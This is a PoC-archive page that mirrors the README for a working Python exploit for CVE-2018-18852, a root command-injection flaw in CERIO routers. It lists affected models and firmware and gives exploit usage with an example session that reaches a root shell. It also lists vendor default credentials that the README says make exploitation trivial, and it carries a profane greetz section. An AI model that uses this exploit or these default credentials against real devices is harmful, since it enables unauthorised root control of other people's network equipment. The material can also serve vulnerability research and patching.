Goal Reached Thanks to every supporter — we hit 100%!

Goal: 1000 CNY · Raised: 1000 CNY

100.0%
Buy Us a Coffee

CVE-2018-18852 PoC — CERIO DT-300N 操作系统命令注入漏洞

Source
https://github.com/hook-s3c/CVE-2018-18852
Associated Vulnerability
Title:CERIO DT-300N 操作系统命令注入漏洞 (CVE-2018-18852)
Description:CERIO DT-300N是中国台湾智鼎资讯(CERIO)公司的一款无线路由器。 CERIO DT-300N 1.1.6版本至1.1.12版本中存在操作命令注入漏洞。攻击者可利用该漏洞执行ping命令。
Description
CERIO RCE CVE-2018-18852, authenticated (vendor defaults) web-based RCE as root user.
Readme
# CERIO router Authenticated RCE (backdoor vendor creds) CVE-2018-18852 Python PoC
hook-s3c (github.com/hook-s3c), @hook_s3c on twitter

Working Python PoC for CVE-2018-18852, originally appearing on;
https://github.com/hook-s3c/CVE-2018-18852

## What's up

CERIO Router models and variants of, DT300N, DT100G, AMR-3204, WMR-200N are 
vulnerable to an authenticated web-based RCE as root user.

Exists as an 0day undisclosed advisory;
https://www.fortiguard.com/zeroday/FG-VD-18-149

Vendor default credentials are usually present, so execution is trivial.

Architecture is MIPS. 


### Usage and example

```
Usage: exploit.py <ipaddress> <port> <creds>
```

```bash

$ python ./exploit.py 127.0.0.1 8080 admin:admin

[*] ================================================
[*] CERIO RCE CVE-2018-18852, confirmed on;
[*] - CERIO DT-300N-NGS-M - fw: Pme-CPE-AP12X V1.0.3
[*] - CERIO DT-300N       - fw: Cen-CPE-N2H10A V1.0.14, Cen-CPE-N2H10A V1.1.6, Cen-CPE-N2H10A V1.1.7
[*] - CERIO DT-100G-N     - fw: Cen-AP-N2H10A V1.0.8
[*] - CERIO DT-100G       - fw: Cen-WR-G2H5 V1.0.7
[*] - CERIO DT-100GX-N    - fw: Cen-AP-N2H8A V1.0.18
[*] - CERIO AMR-3204G     - fw: Cen-AC V2.0.19
[*] - CERIO WMR-200N      - fw: Cen-HS-N2H1 V1.0.6c Test
[*]
[/] by hook (@hook_s3c) https://github.com/hook-s3c/CVE-2018-18852
[/] Greetz to vap0rsquad, ThugCrowd, $noHat$, r0bl0xgang, Udderly Amoosing, illmob, 
[/] The Many Hats Club, Cyber.Phunk, WAC, SHAM, 0x00sec, John McAfee
[/] Go cop YTCracker's Introducing Neals, gov overreach is no joke - wake the fuck up
[*] ================================================

root@cerio:~# id
[!] This may not be the right model (DT-300N-NGS-M), trying again
[+] Sucessfully grabbed pid token: 1312


uid=0(root) gid=0(root)

root@cerio:~# 

```

### Default cred combos;

- operator:1234
- admin:admin
- root:default

## Greetz

Shoutout to vap0rsquad, ThugCrowd, $noHat$, r0bl0xgang, Udderly Amoosing, illmob, The Many Hats Club, Cyber.Phunk, WAC, SHAM, 0x00sec, John McAfee
Go cop YTCracker's Introducing Neals, gov overreach is no joke - wake the fuck up

HTP!!!! YEET
File Snapshot

 [4.0K]  /data/pocs/8a9b79284eed8b90cc9916fc1aa678b79fe7703f
├── [3.9K]  exploit.py
├── [ 34K]  LICENSE
└── [2.0K]  README.md

0 directories, 3 files
Shenlong Bot has cached this for you
Remarks
    1. It is advised to access via the original source first.
    2. If the original source is unavailable, please email f.jinxu#gmail.com for a local snapshot (replace # with @).
    3. Shenlong has snapshotted the POC code for you. To support long-term maintenance, please consider donating. Thank you for your support.